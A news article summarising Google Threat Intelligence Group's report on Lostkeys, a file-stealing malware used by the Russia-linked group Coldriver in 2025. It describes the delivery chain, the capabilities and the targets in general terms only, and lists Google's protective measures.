Google’s Threat Intelligence Group (GTIG) has found a new malware strain named Lostkeys, linked to the Russian government backed hacker group Coldriver, also known as UNC4057, Star Blizzard, and Callisto. As per Google, Lostkeys is capable of stealing all the files from their targeted device and transmitting system information to attackers.
The malware was observed in the campaigns carried out in January, March and April 2025, hinting at the massive escalation in Coldriver’s operational uses. Previously known for credential phishing targeting NATO governments, non-governmental organizations (NGOs), and former intelligence officials, the company has now expanded to include malware deployment for direct data theft.
It is delivered via a multi-stage infection chain, starting with a fake CAPTCHA page that tricks users into executing PowerShell commands. It then fetches the malware stages from a remote server, ultimately leading to the deployment of Lostkeys, which is capable of stealing files from specified directories and extensions, collecting and sending system information and running processes to attackers and evading detection through device-specific checks, such as avoiding execution on virtual machines.
Google has warned that the company targets high profile individuals including government individuals, journalists, think tanks and NFOs. It also added that the group has also targeted individuals connected to Ukraine.
“Coldriver typically targets high-profile individuals at their personal email addresses or at NGO addresses. They are known for stealing credentials and after gaining access to a target’s account they exfiltrate emails and steal contact lists from the compromised account. In select cases, Coldriver also delivers malware to target devices and may attempt to access files on the system,” the company stated in its blog post.
Google has taken steps to mitigate the threat by adding identified malicious websites, domains, and files to Google Safe Browsing. The company has also advised users, particularly those at high risk, to opt for Advanced Protection Program and enable Enhanced Safe Browsing for Chrome.